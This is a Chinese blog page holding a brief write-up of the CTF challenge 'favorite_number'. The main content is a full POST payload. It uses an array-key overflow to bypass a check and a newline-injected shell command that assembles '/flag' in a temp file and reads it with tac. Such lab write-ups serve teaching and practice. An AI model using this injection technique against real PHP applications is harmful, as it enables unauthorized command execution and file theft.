当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- Gartner released, annual Challenger!
- golang源码分析(13)gorpc源码分析
- 罗敏背后是抖音
- 【C语言刷题】指针入门三题|字符串长度、字符串复制、两数交换
- MYSQL一站式学习,看完即学完
- Nacos的基本配置
- Flink学习9:配置idea开发flink-Scala程序环境
- Wechat Gymnasium Appointment Mini Program Graduation Design Finished Works Mini Program Graduation Design Finished Work (6) Question Opening Reply PPT
- 【无标题】
- NeRF:火爆科研圈的三维重建技术大揭秘
猜你喜欢
电烙铁的基础知识
MySQL索引
莱斯大学胡侠团队 ICML 2022 杰出论文: 新型图数据增强方法 G-Mixup|附作者对话
二舅“反转”了?
Continuous integration (4) Jenkins configuration alarm mechanism
Five speakers: seventy genius_platform software platform development 】 【 turn YUY2 RGB24 implementation source code
红蓝对抗经验分享:CS免杀姿势
MySQL常用的日期时间函数
安全至上:落地DevSecOps最佳实践你不得不知道的工具
Navicat 连接Oracle时提示oracle library is not loaded的问题解决
随机推荐
Nacos环境隔离
土巴兔IPO五次折戟,互联网家装未解“中介”之痛
SQL语句基础
DeepMind 首席科学家 Oriol Vinyals 最新访谈:通用 AI 的未来是强交互式元学习
erp系统和wms系统有什么区别
golang刷leetcode动态规划(8)盈利计划
Navicat premium download and install 15 detailed tutorial
Nacos配置中心工作原理(超简单)
图解LeetCode——622. 设计循环队列(难度:中等)
一篇文章带你搞定BFC~
字节面试官狂问我:你没有高并发、性能调优经验,为什么录取你?
Oracle分析归档日志内容时,发现很多null?
谁抢走了华大基因的生意?
NIO Cup 2022 Niu Ke Summer Multi-School Training Camp 5 ABCDFGHK
MYSQL一站式学习,看完即学完
小程序毕设作品之微信体育馆预约小程序毕业设计成品(5)任务书
深圳地铁16号线二期进入盾构施工阶段,首台盾构机顺利始发
MySQL常见面试题汇总(建议收藏!!!)
The days of patching are more difficult than the days of writing code
Five speakers: seventy genius_platform software platform development 】 【 turn YUY2 RGB24 implementation source code